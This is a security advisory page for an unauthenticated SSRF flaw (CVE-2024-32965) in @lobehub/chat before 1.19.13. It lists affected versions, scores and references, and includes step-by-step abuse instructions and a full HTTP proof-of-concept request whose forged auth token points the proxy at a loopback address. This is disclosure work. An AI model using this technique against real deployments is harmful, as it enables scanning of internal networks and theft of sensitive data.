Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: GSA_kwCzR0hTQS0yeGNjLXZtM2YtbThyd84ABByj
@lobehub/chat Server Side Request Forgery vulnerability
Summary
lobe-chat before 1.19.13 has an unauthorized ssrf vulnerability. An attacker can construct malicious requests to cause SSRF without logging in, attack intranet services, and leak sensitive information.
Details
- visit https://chat-preview.lobehub.com/
- click settings -> llm -> openai
- fill the OpenAI API Key you like
- fill the proxy address that you want to attack (e.g. a domain that resolved to a local ip addr like 127.0.0.1.xip.io) (the address will concat the path "/chat/completions" which can be bypassed with sharp like "http://172.23.0.1:8000/#")
- then lobe will echo the ssrf result
The jwt token header X-Lobe-Chat-Auth strored proxy address and OpenAI API Key, you can modify it to scan internal network in your target lobe-web.
PoC
POST /api/chat/openai HTTP/2
Host: chat-preview.lobehub.com
Cookie: LOBE_LOCALE=zh-CN; LOBE_THEME_PRIMARY_COLOR=undefined; LOBE_THEME_NEUTRAL_COLOR=undefined; _ga=GA1.1.86608329.1711346216; _ga_63LP1TV70T=GS1.1.1711346215.1.1.1711346244.0.0.0
Content-Length: 158
Sec-Ch-Ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
X-Lobe-Chat-Auth: eyJhbGciOiJIUzI1NiJ9.eyJhY2Nlc3NDb2RlIjoiIiwiYXBpS2V5IjoiMSIsImVuZHBvaW50IjoiaHR0cDovLzEyNy4wLjAuMS54aXAuaW86MzIxMCIsImlhdCI6MTcxMTM0NjI1MCwiZXhwIjoxNzExMzQ2MzUwfQ.ZZ3v3q9T8E6llOVGOA3ep5OSVoFEawswEfKtufCcwL4
Content-Type: application/json
X-Lobe-Trace: eyJlbmFibGVkIjpmYWxzZX0=
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Accept: */*
Origin: https://chat-preview.lobehub.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://chat-preview.lobehub.com/settings/llm
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,ja;q=0.7
Connection: close
{"model":"gpt-3.5-turbo","stream":true,"frequency_penalty":0,"presence_penalty":0,"temperature":0.6,"top_p":1,"messages":[{"content":"hello","role":"user"}]}
Impact
SSRF, All users will be impacted.
Permalink: https://github.com/advisories/GHSA-2xcc-vm3f-m8rwJSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0yeGNjLXZtM2YtbThyd84ABByj
Source: GitHub Advisory Database
Origin: Unspecified
Severity: High
Classification: General
Published: about 1 month ago
Updated: about 1 month ago
CVSS Score: 8.1
CVSS vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:L/A:L
EPSS Percentage: 0.00043
EPSS Percentile: 0.10511
Identifiers: GHSA-2xcc-vm3f-m8rw, CVE-2024-32965
References:
- https://github.com/lobehub/lobe-chat/security/advisories/GHSA-2xcc-vm3f-m8rw
- https://github.com/lobehub/lobe-chat/commit/e960a23b0c69a5762eb27d776d33dac443058faf
- https://nvd.nist.gov/vuln/detail/CVE-2024-32965
- https://github.com/advisories/GHSA-2xcc-vm3f-m8rw
Blast Radius: 1.0
Affected Packages
npm:@lobehub/chat
Dependent packages: 0Dependent repositories: 0
Downloads: 14,298 last month
Affected Version Ranges: < 1.19.13
Fixed in: 1.19.13
All affected versions: 0.1.6, 0.2.0, 0.3.0, 0.4.0, 0.4.1, 0.4.2, 0.4.3, 0.5.0, 0.6.0, 0.6.1, 0.7.0, 0.8.0, 0.8.1, 0.8.2, 0.9.0, 0.10.0, 0.10.1, 0.10.2, 0.11.0, 0.12.0, 0.12.1, 0.13.0, 0.13.1, 0.14.0, 0.15.0, 0.15.1, 0.16.0, 0.16.1, 0.17.0, 0.18.0, 0.18.1, 0.18.2, 0.19.0, 0.20.0, 0.21.0, 0.22.0, 0.22.1, 0.22.2, 0.23.0, 0.24.0, 0.25.0, 0.26.0, 0.26.1, 0.27.0, 0.27.1, 0.27.2, 0.27.3, 0.27.4, 0.28.0, 0.29.0, 0.30.0, 0.30.1, 0.31.0, 0.32.0, 0.33.0, 0.34.0, 0.35.0, 0.35.1, 0.36.0, 0.36.1, 0.37.0, 0.38.0, 0.39.0, 0.39.1, 0.39.2, 0.39.3, 0.39.4, 0.40.0, 0.40.1, 0.40.2, 0.40.3, 0.40.4, 0.40.5, 0.40.6, 0.40.7, 0.41.0, 0.41.1, 0.41.2, 0.42.0, 0.42.1, 0.42.2, 0.42.3, 0.43.0, 0.44.0, 0.44.1, 0.44.2, 0.44.3, 0.44.4, 0.45.0, 0.46.0, 0.46.1, 0.47.0, 0.48.0, 0.49.0, 0.50.0, 0.51.0, 0.52.0, 0.52.1, 0.53.0, 0.54.0, 0.54.1, 0.54.2, 0.54.3, 0.54.4, 0.55.0, 0.55.1, 0.56.0, 0.57.0, 0.58.0, 0.59.0, 0.60.0, 0.60.1, 0.60.2, 0.60.3, 0.60.4, 0.61.0, 0.62.0, 0.62.1, 0.63.0, 0.63.1, 0.63.2, 0.63.3, 0.64.0, 0.64.1, 0.65.0, 0.65.1, 0.66.0, 0.67.0, 0.68.0, 0.68.1, 0.69.0, 0.69.1, 0.70.0, 0.70.1, 0.70.2, 0.70.3, 0.70.4, 0.71.0, 0.71.1, 0.72.0, 0.72.1, 0.72.2, 0.72.3, 0.72.4, 0.73.0, 0.74.0, 0.75.0, 0.76.0, 0.76.1, 0.76.2, 0.77.0, 0.77.1, 0.77.2, 0.78.0, 0.78.1, 0.79.0, 0.79.1, 0.79.2, 0.79.3, 0.79.4, 0.79.5, 0.79.6, 0.79.7, 0.79.8, 0.80.0, 0.80.1, 0.80.2, 0.81.0, 0.82.1, 0.82.2, 0.82.3, 0.82.4, 0.82.5, 0.82.6, 0.82.7, 0.82.8, 0.82.9, 0.83.0, 0.83.1, 0.83.2, 0.83.3, 0.83.4, 0.83.5, 0.83.6, 0.83.7, 0.83.8, 0.83.9, 0.83.10, 0.84.0, 0.85.0, 0.85.1, 0.85.2, 0.85.3, 0.86.0, 0.86.1, 0.86.2, 0.86.3, 0.86.4, 0.86.5, 0.87.0, 0.88.0, 0.89.0, 0.89.1, 0.89.2, 0.89.3, 0.89.4, 0.89.5, 0.89.6, 0.89.7, 0.89.8, 0.89.9, 0.89.10, 0.90.0, 0.90.1, 0.90.2, 0.90.3, 0.91.0, 0.92.0, 0.93.0, 0.94.0, 0.94.1, 0.94.2, 0.94.3, 0.94.4, 0.94.5, 0.95.0, 0.95.1, 0.96.0, 0.96.1, 0.96.2, 0.96.3, 0.96.4, 0.96.5, 0.96.6, 0.96.7, 0.96.8, 0.96.9, 0.97.0, 0.97.1, 0.98.0, 0.98.1, 0.98.2, 0.98.3, 0.99.0, 0.99.1, 0.100.0, 0.100.1, 0.100.2, 0.100.3, 0.100.4, 0.100.5, 0.101.0, 0.101.1, 0.101.2, 0.101.3, 0.101.4, 0.101.5, 0.101.6, 0.101.7, 0.102.0, 0.102.1, 0.102.2, 0.102.3, 0.102.4, 0.103.0, 0.103.1, 0.104.0, 0.105.0, 0.105.1, 0.105.2, 0.106.0, 0.107.0, 0.107.1, 0.107.2, 0.107.3, 0.107.4, 0.107.5, 0.107.6, 0.107.7, 0.107.8, 0.107.9, 0.107.10, 0.107.11, 0.107.12, 0.107.13, 0.107.14, 0.107.15, 0.107.16, 0.108.0, 0.109.0, 0.109.1, 0.110.0, 0.110.1, 0.110.2, 0.110.3, 0.110.4, 0.110.5, 0.110.6, 0.110.7, 0.110.8, 0.110.9, 0.110.10, 0.111.0, 0.111.1, 0.111.2, 0.111.3, 0.111.4, 0.111.5, 0.111.6, 0.112.0, 0.112.1, 0.113.0, 0.113.1, 0.114.0, 0.114.1, 0.114.2, 0.114.3, 0.114.4, 0.114.5, 0.114.6, 0.114.7, 0.114.8, 0.114.9, 0.115.0, 0.115.1, 0.115.2, 0.115.3, 0.115.4, 0.115.5, 0.115.6, 0.115.7, 0.115.8, 0.115.9, 0.115.10, 0.115.11, 0.115.12, 0.115.13, 0.116.0, 0.116.1, 0.116.2, 0.116.3, 0.116.4, 0.116.5, 0.117.0, 0.117.1, 0.117.2, 0.117.3, 0.117.4, 0.117.5, 0.118.0, 0.118.1, 0.118.2, 0.118.3, 0.118.4, 0.118.5, 0.118.6, 0.118.7, 0.118.8, 0.118.9, 0.118.10, 0.119.0, 0.119.1, 0.119.2, 0.119.3, 0.119.4, 0.119.5, 0.119.6, 0.119.7, 0.119.8, 0.119.9, 0.119.10, 0.119.11, 0.119.12, 0.119.13, 0.120.0, 0.120.1, 0.120.2, 0.120.3, 0.120.4, 0.120.5, 0.120.6, 0.121.0, 0.121.1, 0.121.2, 0.121.3, 0.121.4, 0.122.0, 0.122.1, 0.122.2, 0.122.3, 0.122.4, 0.122.5, 0.122.6, 0.122.7, 0.122.8, 0.122.9, 0.123.0, 0.123.1, 0.123.2, 0.123.3, 0.123.4, 0.124.0, 0.124.1, 0.124.2, 0.124.3, 0.125.0, 0.126.0, 0.126.1, 0.126.2, 0.126.3, 0.126.4, 0.126.5, 0.127.0, 0.127.1, 0.127.2, 0.128.0, 0.128.1, 0.128.2, 0.128.3, 0.128.4, 0.128.5, 0.128.6, 0.128.7, 0.128.8, 0.128.9, 0.128.10, 0.129.0, 0.129.1, 0.129.2, 0.129.3, 0.129.4, 0.129.5, 0.129.6, 0.130.0, 0.130.1, 0.130.2, 0.130.3, 0.130.4, 0.130.5, 0.130.6, 0.130.7, 0.131.0, 0.132.0, 0.132.1, 0.132.2, 0.133.0, 0.133.1, 0.133.2, 0.133.3, 0.133.4, 0.133.5, 0.134.0, 0.134.1, 0.135.0, 0.135.1, 0.135.2, 0.135.3, 0.135.4, 0.136.0, 0.137.0, 0.138.0, 0.138.1, 0.138.2, 0.139.0, 0.139.1, 0.139.2, 0.140.0, 0.140.1, 0.141.0, 0.141.1, 0.141.2, 0.142.0, 0.142.1, 0.142.2, 0.142.3, 0.142.4, 0.142.5, 0.142.6, 0.142.7, 0.142.8, 0.142.9, 0.143.0, 0.144.0, 0.144.1, 0.145.0, 0.145.1, 0.145.2, 0.145.3, 0.145.4, 0.145.5, 0.145.6, 0.145.7, 0.145.8, 0.145.9, 0.145.10, 0.145.11, 0.145.12, 0.145.13, 0.146.0, 0.146.1, 0.146.2, 0.147.0, 0.147.1, 0.147.2, 0.147.3, 0.147.4, 0.147.5, 0.147.6, 0.147.7, 0.147.8, 0.147.9, 0.147.10, 0.147.11, 0.147.12, 0.147.13, 0.147.14, 0.147.15, 0.147.16, 0.147.17, 0.147.18, 0.147.19, 0.147.20, 0.147.21, 0.147.22, 0.148.0, 0.148.1, 0.148.2, 0.148.3, 0.148.4, 0.148.5, 0.148.6, 0.148.7, 0.148.8, 0.148.9, 0.148.10, 0.149.0, 0.149.1, 0.149.2, 0.149.3, 0.149.4, 0.149.5, 0.149.6, 0.150.0, 0.150.1, 0.150.2, 0.150.3, 0.150.4, 0.150.5, 0.150.6, 0.150.7, 0.150.8, 0.150.9, 0.150.10, 0.151.0, 0.151.1, 0.151.2, 0.151.3, 0.151.4, 0.151.5, 0.151.6, 0.151.7, 0.151.8, 0.151.9, 0.151.10, 0.151.11, 0.152.0, 0.152.1, 0.152.2, 0.152.3, 0.152.4, 0.152.5, 0.152.6, 0.152.7, 0.152.8, 0.152.9, 0.152.10, 0.152.11, 0.152.12, 0.153.0, 0.153.1, 0.154.0, 0.154.1, 0.154.2, 0.154.3, 0.154.4, 0.154.5, 0.154.6, 0.154.7, 0.155.0, 0.155.1, 0.155.2, 0.155.3, 0.155.4, 0.155.5, 0.155.6, 0.155.7, 0.155.8, 0.155.9, 0.156.0, 0.156.1, 0.156.2, 0.157.0, 0.157.1, 0.157.2, 0.158.0, 0.158.1, 0.158.2, 0.159.0, 0.159.1, 0.159.2, 0.159.3, 0.159.4, 0.159.5, 0.159.6, 0.159.7, 0.159.8, 0.159.9, 0.159.10, 0.159.11, 0.159.12, 0.160.0, 0.160.1, 0.160.2, 0.160.3, 0.160.4, 0.160.5, 0.160.6, 0.160.7, 0.160.8, 0.161.0, 0.161.1, 0.161.2, 0.161.3, 0.161.4, 0.161.5, 0.161.6, 0.161.7, 0.161.8, 0.161.9, 0.161.10, 0.161.11, 0.161.12, 0.161.13, 0.161.14, 0.161.15, 0.161.16, 0.161.17, 0.161.18, 0.161.19, 0.161.20, 0.161.21, 0.161.22, 0.161.23, 0.161.24, 0.161.25, 0.162.0, 0.162.1, 0.162.2, 0.162.3, 0.162.4, 0.162.5, 0.162.6, 0.162.7, 0.162.8, 0.162.9, 0.162.10, 0.162.11, 0.162.12, 0.162.13, 0.162.14, 0.162.15, 0.162.16, 0.162.17, 0.162.18, 0.162.19, 0.162.20, 0.162.21, 0.162.22, 0.162.23, 0.162.24, 0.162.25, 0.163.0, 0.164.0, 1.0.0, 1.0.1, 1.0.2, 1.0.3, 1.0.4, 1.0.5, 1.0.6, 1.0.7, 1.0.8, 1.0.9, 1.0.10, 1.0.11, 1.0.12, 1.0.13, 1.0.14, 1.1.0, 1.1.1, 1.1.2, 1.1.3, 1.1.4, 1.1.5, 1.1.6, 1.1.7, 1.1.8, 1.1.9, 1.1.10, 1.1.11, 1.1.12, 1.1.13, 1.1.14, 1.1.15, 1.1.16, 1.1.17, 1.1.18, 1.2.0, 1.2.1, 1.2.2, 1.2.3, 1.2.4, 1.2.5, 1.2.6, 1.2.7, 1.2.8, 1.2.9, 1.2.10, 1.2.11, 1.2.12, 1.2.13, 1.2.14, 1.3.0, 1.3.1, 1.3.2, 1.3.3, 1.3.4, 1.3.5, 1.3.6, 1.4.0, 1.4.1, 1.4.2, 1.4.3, 1.5.0, 1.5.1, 1.5.2, 1.5.3, 1.5.4, 1.5.5, 1.6.0, 1.6.1, 1.6.2, 1.6.3, 1.6.4, 1.6.5, 1.6.6, 1.6.7, 1.6.8, 1.6.9, 1.6.10, 1.6.11, 1.6.12, 1.6.13, 1.6.14, 1.6.15, 1.7.0, 1.7.1, 1.7.2, 1.7.3, 1.7.4, 1.7.5, 1.7.6, 1.7.7, 1.7.8, 1.7.9, 1.7.10, 1.8.0, 1.8.1, 1.8.2, 1.9.0, 1.9.1, 1.9.2, 1.9.3, 1.9.4, 1.9.5, 1.9.6, 1.9.7, 1.9.8, 1.10.0, 1.10.1, 1.11.0, 1.11.1, 1.11.2, 1.11.3, 1.11.4, 1.11.5, 1.11.6, 1.11.7, 1.11.8, 1.11.9, 1.12.0, 1.12.1, 1.12.2, 1.12.3, 1.12.4, 1.12.5, 1.12.6, 1.12.7, 1.12.8, 1.12.9, 1.12.10, 1.12.11, 1.12.12, 1.12.13, 1.12.14, 1.12.15, 1.12.16, 1.12.17, 1.12.18, 1.12.19, 1.12.20, 1.13.0, 1.13.1, 1.13.2, 1.14.0, 1.14.1, 1.14.2, 1.14.3, 1.14.4, 1.14.5, 1.14.6, 1.14.7, 1.14.8, 1.14.9, 1.14.10, 1.14.11, 1.14.12, 1.15.0, 1.15.1, 1.15.2, 1.15.3, 1.15.4, 1.15.5, 1.15.6, 1.15.7, 1.15.8, 1.15.9, 1.15.10, 1.15.11, 1.15.12, 1.15.13, 1.15.14, 1.15.15, 1.15.16, 1.15.17, 1.15.18, 1.15.19, 1.15.20, 1.15.21, 1.15.22, 1.15.23, 1.15.24, 1.15.25, 1.15.26, 1.15.27, 1.15.28, 1.15.29, 1.15.30, 1.15.31, 1.15.32, 1.15.33, 1.15.34, 1.15.35, 1.16.0, 1.16.1, 1.16.2, 1.16.3, 1.16.4, 1.16.5, 1.16.6, 1.16.7, 1.16.8, 1.16.9, 1.16.10, 1.16.11, 1.16.12, 1.16.13, 1.16.14, 1.17.0, 1.17.1, 1.17.2, 1.17.3, 1.17.4, 1.17.5, 1.17.6, 1.17.7, 1.18.0, 1.18.1, 1.18.2, 1.19.0, 1.19.1, 1.19.2, 1.19.3, 1.19.4, 1.19.5, 1.19.6, 1.19.7, 1.19.8, 1.19.9, 1.19.10, 1.19.11, 1.19.12
All unaffected versions: 1.19.13, 1.19.14, 1.19.15, 1.19.16, 1.19.17, 1.19.18, 1.19.19, 1.19.20, 1.19.21, 1.19.22, 1.19.23, 1.19.24, 1.19.25, 1.19.26, 1.19.27, 1.19.28, 1.19.29, 1.19.30, 1.19.31, 1.19.32, 1.19.33, 1.19.34, 1.19.35, 1.19.36, 1.20.0, 1.20.1, 1.20.2, 1.20.3, 1.20.4, 1.20.5, 1.20.6, 1.20.7, 1.20.8, 1.21.0, 1.21.1, 1.21.2, 1.21.3, 1.21.4, 1.21.5, 1.21.6, 1.21.7, 1.21.8, 1.21.9, 1.21.10, 1.21.11, 1.21.12, 1.21.13, 1.21.14, 1.21.15, 1.21.16, 1.22.0, 1.22.1, 1.22.2, 1.22.3, 1.22.4, 1.22.5, 1.22.6, 1.22.7, 1.22.8, 1.22.9, 1.22.10, 1.22.11, 1.22.12, 1.22.13, 1.22.14, 1.22.15, 1.22.16, 1.22.17, 1.22.18, 1.22.19, 1.22.20, 1.22.21, 1.22.22, 1.22.23, 1.22.24, 1.22.25, 1.22.26, 1.22.27, 1.23.0, 1.23.1, 1.24.0, 1.24.1, 1.24.2, 1.25.0, 1.25.1, 1.25.2, 1.25.3, 1.26.0, 1.26.1, 1.26.2, 1.26.3, 1.26.4, 1.26.5, 1.26.6, 1.26.7, 1.26.8, 1.26.9, 1.26.10, 1.26.11, 1.26.12, 1.26.13, 1.26.14, 1.26.15, 1.26.16, 1.26.17, 1.26.18, 1.26.19, 1.26.20, 1.26.21, 1.27.0, 1.27.1, 1.27.2, 1.27.3, 1.28.0, 1.28.1, 1.28.2, 1.28.3, 1.28.4, 1.28.5, 1.28.6, 1.29.0, 1.29.1, 1.29.2, 1.29.3, 1.29.4, 1.29.5, 1.29.6, 1.30.0, 1.31.0, 1.31.1, 1.31.2, 1.31.3, 1.31.4, 1.31.5, 1.31.6, 1.31.7, 1.31.8, 1.31.9, 1.31.10, 1.31.11, 1.32.0, 1.32.1, 1.32.2, 1.32.3, 1.32.4, 1.32.5, 1.32.6, 1.32.7, 1.32.8, 1.32.9, 1.33.0, 1.33.1, 1.33.2, 1.33.3, 1.33.4, 1.33.5, 1.34.0, 1.34.1, 1.34.2, 1.34.3, 1.34.4, 1.34.5, 1.34.6, 1.35.0, 1.35.1, 1.35.2, 1.35.3, 1.35.4, 1.35.5, 1.35.6, 1.35.7, 1.35.8, 1.35.9, 1.35.10, 1.35.11, 1.35.12, 1.35.13, 1.35.14, 1.36.0, 1.36.1, 1.36.2, 1.36.3, 1.36.4, 1.36.5, 1.36.6, 1.36.7, 1.36.8, 1.36.9, 1.36.10, 1.36.11, 1.36.12, 1.36.13, 1.36.14, 1.36.15, 1.36.16, 1.36.17, 1.36.18, 1.36.19, 1.36.20, 1.36.21, 1.36.22, 1.36.23, 1.36.24, 1.36.25, 1.36.26, 1.36.27, 1.36.28, 1.36.29, 1.36.30, 1.36.31, 1.36.32, 1.36.33, 1.36.34, 1.36.35, 1.36.36, 1.36.37, 1.36.38, 1.36.39, 1.36.40, 1.36.41, 1.36.42, 1.36.43, 1.36.44, 1.36.45, 1.36.46, 1.37.0, 1.37.1, 1.37.2, 1.38.0, 1.39.0, 1.39.1, 1.39.2, 1.39.3, 1.40.0, 1.40.1